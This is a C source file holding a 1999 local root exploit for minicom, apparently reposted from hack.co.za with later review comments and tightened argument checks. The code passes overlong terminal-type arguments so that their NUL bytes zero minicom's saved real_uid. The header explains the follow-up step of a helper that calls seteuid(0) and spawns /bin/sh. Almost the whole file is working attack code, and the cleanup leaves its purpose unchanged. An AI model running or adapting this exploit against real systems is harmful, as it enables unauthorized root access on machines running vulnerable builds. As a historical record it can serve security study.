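/*
 * minicom local root compromise
 * abr (july 1999)
 *
 * Historical proof of concept. minicom is launched with four overlong
 * "-t" (terminal type) arguments: each is BUFFER_LEN bytes of 'X' with a
 * NUL terminator placed at offset pos, pos+1, pos+2 and pos+3. The
 * original author's premise is that minicom keeps these strings next to
 * its saved real_uid, so the four terminators land on the four bytes of
 * real_uid and zero it ("pad out to real_uid", "real_uid -> 0").
 *
 * Only real_uid is overwritten, so the euid of anything minicom spawns is
 * not 0 by itself. The original note: get minicom to run a shell (the
 * kermit program is user-definable), pointed at a small helper that does
 * seteuid(0) and then system("/bin/sh") to obtain euid 0 as well.
 *
 * Other minicom builds may store real_uid at a different offset; pass it
 * as argv[2]. The offset is only meaningful for the specific 1999-era
 * binaries the author tested -- nothing here verifies the layout.
 *
 * Review notes on the PoC itself (fixed below, behaviour otherwise kept):
 *  - argv[1] was strcpy()'d into a 100-byte buffer: a long path overflowed
 *    the exploit's own stack before minicom was ever reached.
 *  - argv[2] went through atoi() unchecked: a negative or >= 97 offset
 *    wrote outside buf1..buf4 and handed execl() unterminated strings.
 *  - `void main`, missing headers and an unchecked execl() return.
 */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define PATH_TO_MINICOM "/usr/bin/minicom"
#define POSITION 0x34
#define BUFFER_LEN 100
#define TERMTYPE "linux" /* if you don't have this termtype, change it */

/*
 * Fill `buf` (BUFFER_LEN bytes) with 'X' and terminate it at offset `cut`.
 * The resulting string has length `cut`; `cut` must be < BUFFER_LEN.
 */
static void make_pad(char *buf, size_t cut)
{
    memset(buf, 'X', BUFFER_LEN);
    buf[cut] = '\0';
}

/*
 * Usage: prog [path-to-minicom [real_uid-offset]]
 *
 * argv[1]: minicom binary to exec (default PATH_TO_MINICOM).
 * argv[2]: byte offset of real_uid relative to the padding (default
 *          POSITION); decimal, or hex with a 0x prefix.
 * Returns 1 on bad arguments or if execl() fails; never returns on success
 * because the process image is replaced by minicom.
 */
int main(int argc, char *argv[])
{
    char buf1[BUFFER_LEN], buf2[BUFFER_LEN];
    char buf3[BUFFER_LEN], buf4[BUFFER_LEN];
    char prog[BUFFER_LEN];
    long pos = POSITION;
    const char *self = (argc > 0) ? argv[0] : "minicom-exploit";
    const char *src = (argc > 1) ? argv[1] : PATH_TO_MINICOM;

    /* Bounded copy: a 99+ byte argv[1] previously smashed our own stack. */
    if (snprintf(prog, sizeof prog, "%s", src) >= (int)sizeof prog) {
        fprintf(stderr, "%s: path too long (max %zu bytes)\n",
                self, sizeof prog - 1);
        return 1;
    }

    /* other versions may have real_uid stored at a different location */
    if (argc > 2) {
        char *end;
        errno = 0;
        pos = strtol(argv[2], &end, 0);
        if (end == argv[2] || *end != '\0' || errno == ERANGE) {
            fprintf(stderr, "%s: bad offset '%s'\n", self, argv[2]);
            return 1;
        }
    }

    /*
     * The largest terminator goes at pos+3, which must stay inside the
     * BUFFER_LEN-byte buffers; otherwise we corrupt our own stack and pass
     * unterminated strings to execl().
     */
    if (pos < 0 || pos + 3 >= BUFFER_LEN) {
        fprintf(stderr, "%s: offset %ld out of range (0..%d)\n",
                self, pos, BUFFER_LEN - 4);
        return 1;
    }

    /* pad out to real_uid, then real_uid -> 0 (one NUL per byte) */
    make_pad(buf1, (size_t)pos + 0);
    make_pad(buf2, (size_t)pos + 1);
    make_pad(buf3, (size_t)pos + 2);
    make_pad(buf4, (size_t)pos + 3);

    /* execute minicom; argument order is as in the original PoC */
    execl(prog, prog,
          "-t", buf4,
          "-t", buf3,
          "-t", buf2,
          "-t", buf1,
          "-t", TERMTYPE,
          (char *)0);

    /* execl() only returns on failure */
    perror(prog);
    return 1;
}
/* www.hack.co.za [2000]*/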